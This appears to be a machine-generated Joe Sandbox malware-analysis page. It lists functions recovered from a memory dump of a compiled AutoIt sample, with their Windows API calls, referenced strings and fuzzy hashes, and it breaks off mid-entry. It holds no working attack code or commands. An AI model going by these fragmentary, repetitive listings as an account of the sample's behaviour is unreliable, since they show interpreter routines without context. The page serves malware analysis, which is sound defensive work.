
Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 77ea05cd36578bb5e514ff82feea1f195c4457a57fa708d3ecbb008cde36f0bb
Instruction ID: a76d37fc29a3fac302f424da972759727255f892aa79ad482dba6b07dab715c8
Opcode Fuzzy Hash: 77ea05cd36578bb5e514ff82feea1f195c4457a57fa708d3ecbb008cde36f0bb
Instruction Fuzzy Hash: 3471DE78140304AFD725CF28CC49F6A7BE5FB88305F04462DF995972A0DB71EA86CB5A

Function 00C5C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD2612: GetWindowLongW.USER32(?,000000EB), ref: 00BD2623

DragQueryPoint.SHELL32(?,?), ref: 00C5C627

Part of subcall function 00C5AB37: ClientToScreen.USER32(?,?), ref: 00C5AB60
Part of subcall function 00C5AB37: GetWindowRect.USER32(?,?), ref: 00C5ABD6
Part of subcall function 00C5AB37: PtInRect.USER32(?,?,00C5C014), ref: 00C5ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 00C5C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C5C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C5C6BE
_wcscat.LIBCMT ref: 00C5C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C5C705
SendMessageW.USER32(?,000000B0,?,?), ref: 00C5C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 00C5C735
SendMessageW.USER32(?,000000B1,?,?), ref: 00C5C757
DragFinish.SHELL32(?), ref: 00C5C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C5C851

Strings

@GUI_DROPID, xrefs: 00C5C77E
@GUI_DRAGID, xrefs: 00C5C7C9
@GUI_DRAGFILE, xrefs: 00C5C800

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: c5afdbafc097a604af6aa026baee182b40e9640b2aaee01acae86c694ac48281
Instruction ID: 03b9f82b0d36f9cd6318ad5f8e63467e1bc7049e8f6f276080f01b6e480e17a4
Opcode Fuzzy Hash: c5afdbafc097a604af6aa026baee182b40e9640b2aaee01acae86c694ac48281
Instruction Fuzzy Hash: 1D618F75108304AFC705EF64CC85EAFBBF8EF88751F00092EF595922A1EB319A49CB56

Function 00C54392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C54424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C5446F

Strings

GETITEMCOUNT, xrefs: 00C54551
UNCHECK, xrefs: 00C5464B
CHECK, xrefs: 00C5448F
EXISTS, xrefs: 00C544D8
GETSELECTED, xrefs: 00C5457F
ISCHECKED, xrefs: 00C545F2
GETTOTALCOUNT, xrefs: 00C54456
GETTEXT, xrefs: 00C545C2
EXPAND, xrefs: 00C54521
SELECT, xrefs: 00C54620
COLLAPSE, xrefs: 00C544B5

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: a0af17db0199c8f415fd281106b3be53f2099247bbf851c5c303c9184bc3a10e
Instruction ID: 5c272a4883dc45a245fa82c8f8a23cc114bba36ac3bdd5327e9ca07ca1f7d2ad
Opcode Fuzzy Hash: a0af17db0199c8f415fd281106b3be53f2099247bbf851c5c303c9184bc3a10e
Instruction Fuzzy Hash: 62919C742007019FCB08EF10C451A6EB7E1EF95758F0448A9FCA65B3A2DB31ED8ADB85

Function 00C5B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00C5B8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00C591C2), ref: 00C5B910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C5B949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00C5B98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C5B9C3
FreeLibrary.KERNEL32(?), ref: 00C5B9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C5B9DF
DestroyIcon.USER32(?,?,?,?,?,00C591C2), ref: 00C5B9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C5BA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C5BA17

Part of subcall function 00BF2EFD: __wcsicmp_l.LIBCMT ref: 00BF2F86

Strings

.exe, xrefs: 00C5B84A
.dll, xrefs: 00C5B86D
.icl, xrefs: 00C5B82A

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 8d625fc1e5148cc0ca3a13750f61a6df1d4fccc4aa7e70e1c8d61feb704410f3
Instruction ID: 2c47f00d7c9589c6e0c4e085a239facec20132ebd90d01449d8481e1ae4b9d78
Opcode Fuzzy Hash: 8d625fc1e5148cc0ca3a13750f61a6df1d4fccc4aa7e70e1c8d61feb704410f3
Instruction Fuzzy Hash: C061EF75900609BAEB18DF64CC45FBE7BB8EB08712F10411AFE25D61C1DB749E84DBA0

Function 00C3A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00BD9837: __itow.LIBCMT ref: 00BD9862
Part of subcall function 00BD9837: __swprintf.LIBCMT ref: 00BD98AC

CharLowerBuffW.USER32(?,?), ref: 00C3A3CB
GetDriveTypeW.KERNEL32 ref: 00C3A418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C3A460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C3A497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C3A4C5

Part of subcall function 00BD7BCC: _memmove.LIBCMT ref: 00BD7C06

Strings

set cd door , xrefs: 00C3A466
type cdaudio alias cd wait, xrefs: 00C3A443
open , xrefs: 00C3A427
close cd wait, xrefs: 00C3A4B0
wait, xrefs: 00C3A482
open, xrefs: 00C3A3F2
closed, xrefs: 00C3A3DF, 00C3A3E8
close, xrefs: 00C3A3D1

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 8a75e1a0193a53cf48c73afafbe3b0d959b20ac1f2a9734f9262f7535fc003ca
Instruction ID: 5b99e54b07dbaf7cb2b5705767b5eb93faec35391fddf1376db82c7c8b6329ab
Opcode Fuzzy Hash: 8a75e1a0193a53cf48c73afafbe3b0d959b20ac1f2a9734f9262f7535fc003ca
Instruction Fuzzy Hash: D9517F751147059FC704EF20C99196AB3F4EF98758F4088AEF895573A1EB31EE0ACB52

Function 00C2F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00C0E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00C2F8DF
LoadStringW.USER32(00000000,?,00C0E029,00000001), ref: 00C2F8E8

Part of subcall function 00BD7DE1: _memmove.LIBCMT ref: 00BD7E22

GetModuleHandleW.KERNEL32(00000000,00C95310,?,00000FFF,?,?,00C0E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00C2F90A
LoadStringW.USER32(00000000,?,00C0E029,00000001), ref: 00C2F90D
__swprintf.LIBCMT ref: 00C2F95D
__swprintf.LIBCMT ref: 00C2F96E
_wprintf.LIBCMT ref: 00C2FA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C2FA2E

Strings

Line %d:, xrefs: 00C2F968
Line %d (File "%s"):, xrefs: 00C2F957
%s (%d) : ==> %s: %s %s, xrefs: 00C2FA12
Error: , xrefs: 00C2F9E5
^ ERROR, xrefs: 00C2F9C3

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: a7c3f9c6cce37890327244daf86558e2b5a1215b5ef7e0b26a938cf3a94cc403
Instruction ID: d0aed1fe249344804f364a6bcdbb5de6e6465fe840c80ed3fe0c68e36b99f954
Opcode Fuzzy Hash: a7c3f9c6cce37890327244daf86558e2b5a1215b5ef7e0b26a938cf3a94cc403
Instruction Fuzzy Hash: 05412D7284421DAACB14FBE0DD96EEEB7B8AF14300F5000B6B50572191FE355F49DB60

Function 00C5BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00C59207,?,?), ref: 00C5BA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00C59207,?,?,00000000,?), ref: 00C5BA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00C59207,?,?,00000000,?), ref: 00C5BA78
CloseHandle.KERNEL32(00000000,?,?,?,?,00C59207,?,?,00000000,?), ref: 00C5BA85
GlobalLock.KERNEL32(00000000), ref: 00C5BA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00C59207,?,?,00000000,?), ref: 00C5BA9D
GlobalUnlock.KERNEL32(00000000), ref: 00C5BAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,00C59207,?,?,00000000,?), ref: 00C5BAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00C59207,?,?,00000000,?), ref: 00C5BABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,00C62CAC,?), ref: 00C5BAD7
GlobalFree.KERNEL32(00000000), ref: 00C5BAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 00C5BB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00C5BB36
DeleteObject.GDI32(00000000), ref: 00C5BB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C5BB74

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 23c3ca254d9cb719bcfba22a8494e977ad46bc5dd07b5e9455566762985af5b1
Instruction ID: ec5ae5718e7d46621b483af56e08f76153e8d877e4155effd43ea53c3eadb634
Opcode Fuzzy Hash: 23c3ca254d9cb719bcfba22a8494e977ad46bc5dd07b5e9455566762985af5b1
Instruction Fuzzy Hash: 88413A79500205EFDB159F65DC88FAFBBB8EB89712F104068F915E7260D7709E86DB20

Function 00C3D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00C3DA10
_wcscat.LIBCMT ref: 00C3DA28
_wcscat.LIBCMT ref: 00C3DA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C3DA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 00C3DA63
GetFileAttributesW.KERNEL32(?), ref: 00C3DA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 00C3DA95
SetCurrentDirectoryW.KERNEL32(?), ref: 00C3DAA7

Strings

*.*, xrefs: 00C3DAE6

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 873639f5f0f5ff91626117ac0c1aef4412aed3728864200821853a2cb0069cb8
Instruction ID: ad16f1bbca9a8b5c63c4fda8e251e586c4326743210353f1638d77bfb99f2828
Opcode Fuzzy Hash: 873639f5f0f5ff91626117ac0c1aef4412aed3728864200821853a2cb0069cb8
Instruction Fuzzy Hash: CD81C5715143419FCB24EF65D840AAEB7E8BF89710F18486EF89AC7251EB30DE45CB52

Function 00C5C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD2612: GetWindowLongW.USER32(?,000000EB), ref: 00BD2623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C5C1FC
GetFocus.USER32 ref: 00C5C20C
GetDlgCtrlID.USER32(00000000), ref: 00C5C217
_memset.LIBCMT ref: 00C5C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C5C36D
GetMenuItemCount.USER32(?), ref: 00C5C38D
GetMenuItemID.USER32(?,00000000), ref: 00C5C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C5C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C5C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C5C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00C5C489

Strings

0, xrefs: 00C5C33A

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: f725ea42c5df5fbfa71ee7ffc45614f9b61c1092719540471d1c85c1e9436bab
Instruction ID: efb78bfb6c44f2575272b18cf40ccb59e2c2b7aa611f7351b462e45e9263fe5f
Opcode Fuzzy Hash: f725ea42c5df5fbfa71ee7ffc45614f9b61c1092719540471d1c85c1e9436bab
Instruction Fuzzy Hash: 9381AC786083059FDB14CF14C8C4A7BBBE4EB88715F00492EFDA5972A1D730DA89CB66

Function 00C4731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00C4738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00C4739B
CreateCompatibleDC.GDI32(?), ref: 00C473A7
SelectObject.GDI32(00000000,?), ref: 00C473B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00C47408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00C47444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00C47468
SelectObject.GDI32(00000006,?), ref: 00C47470
DeleteObject.GDI32(?), ref: 00C47479
DeleteDC.GDI32(00000006), ref: 00C47480
ReleaseDC.USER32(00000000,?), ref: 00C4748B

Strings

(, xrefs: 00C47410

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: e36bb0775dcaa87e2840184629b4e245062c779ed169b0a8f605bb8fe8e87522
Instruction ID: e372a8b90cc6bea162ee98a185d7d4d5a53e7d66fce973a68385f0994e01e411
Opcode Fuzzy Hash: e36bb0775dcaa87e2840184629b4e245062c779ed169b0a8f605bb8fe8e87522
Instruction Fuzzy Hash: 64512775904309AFDB14CFA9CC85BAEBBB9FF88310F14852DFA59A7261C731A9418B50

Function 00BD6A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00BF0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00BD6B0C,?,00008000), ref: 00BF0973

Part of subcall function 00BD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BD4743,?,?,00BD37AE,?), ref: 00BD4770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00BD6BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00BD6CFA

Part of subcall function 00BD586D: _wcscpy.LIBCMT ref: 00BD58A5

Part of subcall function 00BF363D: _iswctype.LIBCMT ref: 00BF3645

Strings

Bad directive syntax error, xrefs: 00C0E79D
Error opening the file, xrefs: 00C0E43D, 00C0E4B8
Unterminated string, xrefs: 00C0E7E4
>>>AUTOIT SCRIPT<<<, xrefs: 00C0E496
EA06, xrefs: 00C0E452
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00C0E421
AU3!, xrefs: 00BD6B61

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 08ffe01963d3d237ed59a75442556030d564df6de16082eb76f7b9f69bbf50a3
Instruction ID: b993418e35313dd0f460c7e97fccfc39318027e59bee811321c0cc55d3a25fec
Opcode Fuzzy Hash: 08ffe01963d3d237ed59a75442556030d564df6de16082eb76f7b9f69bbf50a3
Instruction Fuzzy Hash: 3602AE701083449FC724EF24C891AAFBBE5EF95314F144D6EF499972A2EB30DA49CB52

Function 00C32D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C32D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00C32DDD
GetMenuItemCount.USER32(00C95890), ref: 00C32E66
DeleteMenu.USER32(00C95890,00000005,00000000,000000F5,?,?), ref: 00C32EF6
DeleteMenu.USER32(00C95890,00000004,00000000), ref: 00C32EFE
DeleteMenu.USER32(00C95890,00000006,00000000), ref: 00C32F06
DeleteMenu.USER32(00C95890,00000003,00000000), ref: 00C32F0E
GetMenuItemCount.USER32(00C95890), ref: 00C32F16
SetMenuItemInfoW.USER32(00C95890,00000004,00000000,00000030), ref: 00C32F4C
GetCursorPos.USER32(?), ref: 00C32F56
SetForegroundWindow.USER32(00000000), ref: 00C32F5F
TrackPopupMenuEx.USER32(00C95890,00000000,?,00000000,00000000,00000000), ref: 00C32F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C32F7E

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: d86e60470ef46dbf5eb9a8ffccfebe94444a58e196e8e01b6bf2783f691ed1ab
Instruction ID: 5ae9395b1ea16f420bcbda1849ea98c39e7db120c53171f36a52112403ddefa6
Opcode Fuzzy Hash: d86e60470ef46dbf5eb9a8ffccfebe94444a58e196e8e01b6bf2783f691ed1ab
Instruction Fuzzy Hash: 2B710470610215BFEF259F55DC86FAABF64FF04325F10422AF625AA1E0C7B16D50DB90

Function 00C277DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD7BCC: _memmove.LIBCMT ref: 00BD7C06

_memset.LIBCMT ref: 00C2786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C278A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C278BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C278D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C27902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00C2792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C27935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C2793A

Strings

\IPC$, xrefs: 00C27882
SOFTWARE\Classes\, xrefs: 00C2780C
\CLSID, xrefs: 00C27822

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

